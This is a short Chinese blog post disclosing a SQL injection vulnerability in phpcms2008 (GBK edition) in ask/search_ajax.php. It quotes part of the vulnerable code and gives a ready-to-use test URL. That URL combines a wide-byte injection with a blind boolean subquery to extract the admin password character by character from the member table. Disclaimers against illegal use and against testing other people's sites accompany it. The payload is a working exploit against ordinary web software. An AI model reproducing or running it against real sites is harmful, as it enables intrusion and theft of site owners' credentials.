phpcms2008漏洞

2009年5月3日星期日 | 标签: | |

PHPCMS从2007到2008,漏洞一直存在。
本代码只供参考,不得用于非法用途,站长们请做好防护!
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php

code:
listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val) {$val['title'] = str_replace($q, ''.$q.'', $val['title']);$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];$info[$key]['url'] = $val['url'];}
echo(json_encode($info));?>

测试方法:ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
请不要拿别人的站测试,要测试请到官方下载并且本地测试!

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template